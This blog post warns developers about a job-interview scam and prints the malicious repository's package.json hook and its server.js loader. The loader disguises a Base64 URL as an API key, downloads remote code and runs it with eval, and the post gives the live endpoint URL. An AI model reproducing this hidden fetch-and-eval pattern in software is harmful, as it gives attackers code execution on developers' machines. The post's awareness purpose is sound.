Nikola Perišić

From job offer to malware: developers, be cautious!

Note: This story was adapted from a Reddit post. I have not directly communicated with anyone from the “Modex platform”. I am sharing it to raise awareness among developers, because situations like this are common.

John was contacted by an HR representative about a Frontend Developer position, a very appealing offer. The job description can be found here. A meeting was scheduled, during which the recruiter provided a GitHub repository and asked him to clone it, run it locally, and connect his MetaMask wallet.

Something about this seemed off, so John informed the recruiter that he could not do it immediately and would review the code first. That decision most likely kept his machine and wallet from being compromised.

The suspicious scripts

When he looked at the package.json, he noticed that every script first runs server/server.js before the expected react-scripts command:

```json
"scripts": {
  "start": "node server/server.js | react-scripts --openssl-legacy-provider start",
  "build": "node server/server.js | react-scripts --openssl-legacy-provider build",
  "test": "node server/server.js | react-scripts --openssl-legacy-provider test",
  "eject": "node server/server.js | react-scripts --openssl-legacy-provider eject"
}
```

Opening server.js, he found this:

```javascript
// Not an API key: a Base64-encoded URL (decoded below)
const AUTH_API_KEY = "aHR0cHM6Ly9hdXRobG9naW4tbmluZS52ZXJjZWwuYXBwL2FwaQ==";

(async () => {
  const src = atob(AUTH_API_KEY);                    // decode to the remote URL
  const proxy = (await import('node-fetch')).default;
  try {
    const response = await proxy(src);               // download the payload
    if (!response.ok) throw new Error(`HTTP error! status: ${response.status}`);
    const proxyInfo = await response.text();
    eval(proxyInfo);                                 // execute it inside this Node.js process
  } catch (err) {
    console.error('Auth Error!', err);
  }
})();
```

At first glance it looks like an API key, but AUTH_API_KEY is actually a Base64-encoded URL pointing to a malicious endpoint.

In this snippet, atob decodes the value of AUTH_API_KEY into a plain URL, which is stored in src. node-fetch is then dynamically imported, and await proxy(src) downloads whatever that endpoint returns. Finally the fetched text (the malicious code) is passed to eval and executed inside the Node.js process, with the same privileges as the developer who ran the npm script.

If we manually decode the value stored in AUTH_API_KEY, it reveals the following URL: https://authlogin-nine.vercel.app/api

(Screenshot: the value decoded using https://www.base64decode.org)

When we open that link in our browser, we see the following:

(Screenshot of the response. You can check it yourself on: https://authlogin-nine.vercel.app/api)

But is it safe to visit this link? Yes, it is safe to open it in your browser: the browser only displays the returned text. There is no Node.js process on the other end passing that text to eval, so nothing is executed.

In conclusion, running npm run start, or any of the other scripts (build, test, eject), would expose your system to this malicious code, because each of them runs server/server.js first.

What ChatGPT revealed about this malicious code

After copying the code into ChatGPT for analysis, this was the response:

This is obfuscated Node.js malware/backdoor. It decodes strings at runtime, loads standard Node modules (os, fs, child_process), enumerates system/user info, reads and writes files, spawns commands, and contacts a remote endpoint. It acts as a downloader/exfiltrator and a persistence/command-execution helper. Treat it as malicious, isolate affected hosts, and perform incident response.

Research on the recruiter and company

John checked the recruiter and the company online, and everything seemed legitimate:

  1. Recruiter’s presence on conference websites: VBS Live
  2. Forbes CEE Forum article: Forbes
  3. LinkedIn company profile: Modex Platform
  4. Company website: modex.tech

Conclusion & tips

John’s experience shows how convincing job offers can hide malicious code. By reviewing the code first, he avoided running a Node.js backdoor.

Tips to spot potential scams:

  1. Requests to clone a repository and run it locally immediately
  2. Asking to connect a crypto wallet or provide private keys
  3. Pressure to complete tasks without reviewing the code first
  4. Recruiters or companies that cannot be verified via LinkedIn, official website, or other credible sources

Being cautious and reviewing code carefully can prevent serious security risks.
